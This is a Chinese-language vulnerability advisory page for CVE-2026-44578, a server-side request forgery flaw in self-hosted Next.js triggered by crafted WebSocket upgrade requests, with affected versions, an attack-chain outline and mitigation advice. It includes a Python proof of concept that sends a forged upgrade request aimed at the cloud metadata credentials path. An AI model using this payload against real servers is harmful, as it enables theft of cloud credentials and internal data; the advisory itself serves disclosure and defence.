IPBUF安全漏洞报告
English
CVE-2026-44578 CVSS 8.6 高危

CVE-2026-44578 Next.js服务端请求伪造漏洞

披露日期: 2026-05-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-44578
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
8.6 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Next.js

相关标签

SSRFNext.jsWebSocket信息泄露高危漏洞Node.js

漏洞概述

Next.js在特定版本(13.4.13至15.5.16之前和16.2.5之前)中存在安全漏洞。自托管的应用程序在使用内置Node.js服务器时,容易受到通过精心制作的WebSocket升级请求发起的服务端请求伪造(SSRF)攻击。攻击者可利用此漏洞诱使服务器向任意内部或外部目标代理请求,可能导致内部服务敏感信息泄露或云元数据端点被访问。Vercel托管的部署不受此漏洞影响。

技术细节

该漏洞源于Next.js内置Node.js服务器在处理WebSocket升级请求时的逻辑缺陷。攻击者通过构造特制的WebSocket握手请求,可以绕过正常的请求验证机制,利用服务器作为代理向内网资源或外部特定地址发起请求。由于攻击无需用户交互且无需认证(CVSS向量显示PR:N, UI:N),且影响范围广(S:C),攻击者可轻易探测并访问内网服务、读取本地文件或获取云厂商元数据(如AWS/GCP的元数据服务),从而造成严重的信息泄露风险。

攻击链分析

STEP 1
侦察
识别互联网上运行易受攻击Next.js版本(13.4.13至15.5.16前或16.2.5前)的自托管服务器。
STEP 2
武器化
构造指向内网敏感资源(如127.0.0.1、内部API或云元数据API)的恶意WebSocket升级HTTP请求。
STEP 3
利用
向目标Next.js服务器发送特制的WebSocket握手请求,触发服务端请求伪造。
STEP 4
执行
Next.js服务器解析请求并作为代理,向攻击者指定的内部目标发起连接。
STEP 5
影响
获取内网服务的响应数据,可能导致敏感信息泄露、凭证窃取或为进一步攻击提供立足点。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket # Target vulnerable Next.js server target_host = "vulnerable-nextjs-app.com" target_port = 80 # Internal target to access (e.g., cloud metadata or internal admin panel) # The vulnerability allows proxying requests to arbitrary destinations via WebSocket upgrade internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" payload = ( f"GET {internal_target} HTTP/1.1\r\n" f"Host: {target_host}\r\n" "Upgrade: websocket\r\n" "Connection: Upgrade\r\n" "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n" "Sec-WebSocket-Version: 13\r\n" "\r\n" ) print(f"Sending malicious WebSocket upgrade request to {target_host}...") with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((target_host, target_port)) s.sendall(payload.encode()) response = s.recv(4096) print("Response from internal target via SSRF:") print(response.decode())

影响范围

13.4.13 <= version < 15.5.16
16.0.0 <= version < 16.2.5

防御指南

临时缓解措施
如果无法立即升级,建议在网络层面实施严格的出站访问控制,阻断服务器访问内网敏感网段(如127.0.0.1、169.254.169.254等)。同时,检查并清理云实例的元数据服务访问权限,确保即使发生SSRF也无法获取敏感凭证。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表